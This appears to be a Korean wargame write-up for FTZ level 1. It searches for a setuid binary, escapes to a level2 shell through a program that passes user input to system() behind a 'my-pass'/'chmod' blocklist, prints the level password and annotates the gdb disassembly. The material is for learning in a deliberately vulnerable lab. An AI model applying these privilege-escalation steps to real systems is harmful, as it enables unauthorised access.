FTZ_Level_1

2020. 3. 9. 20:14FTZ

[level1@ftz level1]$ find / -user level2 -perm -4000 2>/dev/null 
/bin/ExecuteMe 

 

[level1@ftz level1]$ /bin/ExecuteMe

                레벨2의 권한으로 당신이 원하는 명령어를 
                한가지 실행시켜 드리겠습니다. 
                (단, my-pass 와 chmod는 제외) 

                어떤 명령을 실행시키겠습니까? 


                [level2@ftz level2]$ bash

[level2@ftz level2]$ my-pass

Level2 Password is "hacker or cracker".

[level1@ftz level1]$ gdb /bin/ExecuteMe

(gdb) disassemble main

Dump of assembler code for function main:

0x08048488 <main+0>: push %ebp /* main 프레임을 만들기 전에 호출자의 EBP(이전 스택 프레임의 베이스 포인터)를 스택에 저장 */

0x08048489 <main+1>: mov %esp,%ebp /* 현재의 스택 포인터(ESP)를 이 프레임의 베이스 포인터(EBP)로 복사 */

0x0804848b <main+3>: sub $0x28,%esp /* main()에서 사용할 지역 변수 공간(0x28 = 40바이트) 확보 */

0x0804848e <main+6>: and $0xfffffff0,%esp /* ESP를 16바이트 경계로 정렬 */

0x08048491 <main+9>: mov $0x0,%eax

0x08048496 <main+14>: sub %eax,%esp

0x08048498 <main+16>: sub $0xc,%esp

0x0804849b <main+19>: push $0x8048680

0x080484a0 <main+24>: call 0x8048358 <system> /* int system(const char *string); */

0x080484a5 <main+29>: add $0x10,%esp

0x080484a8 <main+32>: sub $0xc,%esp

0x080484ab <main+35>: push $0x804868f

0x080484b0 <main+40>: call 0x8048378 <chdir> /* int chdir(const char *path); */

0x080484b5 <main+45>: add $0x10,%esp

0x080484b8 <main+48>: sub $0xc,%esp

0x080484bb <main+51>: push $0x80486a0

0x080484c0 <main+56>: call 0x80483a8 <printf> /* int printf(const char *format, ...); */

0x080484c5 <main+61>: add $0x10,%esp

0x080484c8 <main+64>: sub $0xc,%esp

0x080484cb <main+67>: push $0x80486e0

0x080484d0 <main+72>: call 0x80483a8 <printf>

0x080484d5 <main+77>: add $0x10,%esp

0x080484d8 <main+80>: sub $0xc,%esp

0x080484db <main+83>: push $0x8048720

0x080484e0 <main+88>: call 0x80483a8 <printf>

0x080484e5 <main+93>: add $0x10,%esp

0x080484e8 <main+96>: sub $0xc,%esp

0x080484eb <main+99>: push $0x8048760

0x080484f0 <main+104>: call 0x80483a8 <printf>

---Type <return> to continue, or q <return> to quit---

0x080484f5 <main+109>: add $0x10,%esp

0x080484f8 <main+112>: sub $0xc,%esp

0x080484fb <main+115>: push $0x8048782

0x08048500 <main+120>: call 0x80483a8 <printf>

0x08048505 <main+125>: add $0x10,%esp

0x08048508 <main+128>: sub $0x4,%esp

0x0804850b <main+131>: pushl $0x8049948

0x08048511 <main+137>: push $0x1e /* 0x1e = (10진수) 16 + 14 = 30: fgets가 읽을 최대 크기(널 포함). 버퍼는 ebp-0x28(40바이트)이므로 여기서는 넘치지 않음 */

0x08048513 <main+139>: lea 0xffffffd8(%ebp),%eax

0x08048516 <main+142>: push %eax

0x08048517 <main+143>: call 0x8048368 <fgets> /* char *fgets(char *s, int size, FILE *stream); — s = ebp-0x28, size = 30, stream = stdin */

0x0804851c <main+148>: add $0x10,%esp

0x0804851f <main+151>: lea 0xffffffd8(%ebp),%eax

0x08048522 <main+154>: sub $0x8,%esp

0x08048525 <main+157>: push $0x804879c

0x0804852a <main+162>: push %eax

0x0804852b <main+163>: call 0x8048388 <strstr> /* char *strstr(const char *haystack, const char *needle); — 입력 버퍼에서 "my-pass" 부분 문자열 검사 */

0x08048530 <main+168>: add $0x10,%esp

0x08048533 <main+171>: test %eax,%eax

0x08048535 <main+173>: je 0x8048551 <main+201>

0x08048537 <main+175>: sub $0xc,%esp

0x0804853a <main+178>: push $0x80487c0

0x0804853f <main+183>: call 0x80483a8 <printf>

0x08048544 <main+188>: add $0x10,%esp

0x08048547 <main+191>: sub $0xc,%esp

0x0804854a <main+194>: push $0x0

0x0804854c <main+196>: call 0x80483c8 <exit>

0x08048551 <main+201>: lea 0xffffffd8(%ebp),%eax

0x08048554 <main+204>: sub $0x8,%esp

0x08048557 <main+207>: push $0x80487e8

---Type <return> to continue, or q <return> to quit---

0x0804855c <main+212>: push %eax

0x0804855d <main+213>: call 0x8048388 <strstr> /* 찾는 문자열("chmod")이 존재하면 %eax = 찾은 위치의 포인터, 없으면 %eax = 0 */

0x08048562 <main+218>: add $0x10,%esp

0x08048565 <main+221>: test %eax,%eax /* AND 연산 후 0이면 ZF=1 */

0x08048567 <main+223>: je 0x8048583 <main+251> /* if ZF=1 jump 0x8048583 */

0x08048569 <main+225>: sub $0xc,%esp /* if ZF=0 여기 실행 */

0x0804856c <main+228>: push $0x8048800

0x08048571 <main+233>: call 0x80483a8 <printf>

0x08048576 <main+238>: add $0x10,%esp

0x08048579 <main+241>: sub $0xc,%esp

0x0804857c <main+244>: push $0x0

0x0804857e <main+246>: call 0x80483c8 <exit>

0x08048583 <main+251>: sub $0xc,%esp

0x08048586 <main+254>: push $0x8048826

0x0804858b <main+259>: call 0x80483a8 <printf>

0x08048590 <main+264>: add $0x10,%esp

0x08048593 <main+267>: sub $0x8,%esp

0x08048596 <main+270>: push $0xbba /* 0xbba = (10진수) 3002 */

0x0804859b <main+275>: push $0xbba /* 0xbba = (10진수) 3002 */

0x080485a0 <main+280>: call 0x80483b8 <setreuid> /* int setreuid(uid_t ruid, uid_t euid); — 실제 uid와 유효 uid를 모두 3002로 설정(이후 프롬프트로 보아 level2의 uid) */

0x080485a5 <main+285>: add $0x10,%esp

0x080485a8 <main+288>: sub $0xc,%esp

0x080485ab <main+291>: lea 0xffffffd8(%ebp),%eax

0x080485ae <main+294>: push %eax

0x080485af <main+295>: call 0x8048358 <system> /* setreuid(3002,3002) 이후 사용자가 입력한 버퍼(ebp-0x28)를 그대로 system()에 전달. 앞의 검사는 "my-pass"와 "chmod" 부분 문자열만 거르는 블랙리스트이므로, 그 외의 명령(위에서 입력한 bash 등)은 level2 권한으로 실행됨 — 사용자 입력을 system()에 넘기면서 금지어 목록에 의존하는 것이 이 프로그램의 취약점 */

0x080485b4 <main+300>: add $0x10,%esp

0x080485b7 <main+303>: leave

0x080485b8 <main+304>: ret

0x080485b9 <main+305>: nop

0x080485ba <main+306>: nop

---Type <return> to continue, or q <return> to quit---

0x080485bb <main+307>: nop

End of assembler dump.

(gdb) x/s 0x8048680

0x8048680 <_IO_stdin_used+28>: "/usr/bin/clear"

(gdb) x/s 0x804868f

0x804868f <_IO_stdin_used+43>: "/home/level2"

(gdb) x/s 0x80486e0

0x80486e0 <_IO_stdin_used+124>: "\t\t한가지 실행시켜 드리겠습니다.\n"

(gdb) x/s 0x8048720

0x8048720 <_IO_stdin_used+188>: "\t\t(단, my-pass 와 chmod는 제외)\n"

(gdb) x/s 0x8048760

0x8048760 <_IO_stdin_used+252>: "\n\t\t어떤 명령을 실행시키겠습니까?\n"

(gdb) x/s 0x8048782

0x8048782 <_IO_stdin_used+286>: "\n\n\t\t[level2@ftz level2]$ "

(gdb) x/s 0x8049948

0x8049948 <stdin@@GLIBC_2.0>: ""

(gdb) x/s 0x804879c

0x804879c <_IO_stdin_used+312>: "my-pass"

(gdb) x/s 0x80487c0

0x80487c0 <_IO_stdin_used+348>: "\n\t\tmy-pass 명령은 사용할 수 없습니다.\n\n"

(gdb) x/s 0x80487e8

0x80487e8 <_IO_stdin_used+388>: "chmod"

(gdb) x/s 0x8048800

0x8048800 <_IO_stdin_used+412>: "\n\t\tchmod 명령은 사용할 수 없습니다.\n\n"

(gdb) x/s 0x8048826

0x8048826 <_IO_stdin_used+450>: "\n\n"

(gdb) quit

 
